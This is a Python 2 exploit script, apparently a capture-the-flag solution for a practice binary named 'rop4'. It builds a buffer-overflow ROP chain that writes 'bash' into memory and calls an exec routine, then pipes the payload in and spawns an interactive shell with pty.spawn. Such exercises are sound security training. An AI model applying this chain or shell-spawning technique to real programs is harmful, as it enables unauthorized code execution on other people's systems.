#! /usr/bin/python
import sys
import struct
# Q packs a 32-bit unsigned integer into 4 bytes using the *host's* byte order
# (sys.byteorder). On Python 2 (see the shebang and str.encode('hex') below)
# struct.pack returns a str, which is what lets it concatenate with the
# string filler in the payload. Because the format is chosen from the host
# rather than from the target binary, the bytes written depend on the machine
# this script runs on.
if sys.byteorder == 'little':
    Q = lambda x: struct.pack("<I", x)
elif sys.byteorder == 'big':
    Q = lambda x: struct.pack(">I", x)
# Gadget addresses (per the author's annotations) packed with Q. Each gadget
# ends in `ret`, which is why they can be chained as successive return
# addresses on the stack.
# 0x0806d1aa: movl %eax, (%ecx) ; ret ;
g0 = Q(0x0806d1aa)
# 0x080e3c2a: popl %ecx ; ret ;
g1 = Q(0x080e3c2a)
# 0x080c28c6: popl %eax ; ret ;
g2 = Q(0x080c28c6)
# Filler up to the saved return address. The 0x80 + 12 split is the author's
# stack layout for rop4 and cannot be verified from this file alone.
payload = "\x41"*(0x80 + 12) # junk
payload += g1 # popl %ecx; ret;
payload += Q(0x080f112c) # exec_string addr (popped into %ecx by g1)
payload += g2 # popl %eax; ret;
# Packed big-endian on purpose so the bytes land in memory in string order;
# int("bash".encode('hex'), 16) is 0x62617368, so this is the 4 bytes "bash".
# str.encode('hex') exists only on Python 2.
payload += struct.pack(">I", int(("bash").encode('hex'), 0x10)) # 'bash'
payload += g0 # movl %eax, (%ecx): stores the 4 bytes above at exec_string
payload += Q(0x08048ed0) # exec_the_string addr
payload += Q(0xdeadbeef) # bogus return addr
# Written in text mode ("w"); the file object is never closed explicitly and
# relies on CPython discarding the temporary to flush and close it.
open("/tmp/pl", "w").write(payload)
Run the Python script, and finally do the magic trick:
host$ python pwn.py && (cat /tmp/pl 2> /dev/null; cat -) | ./rop4
python -c 'import pty;pty.spawn("/bin/sh")'
$ echo "pwned!!"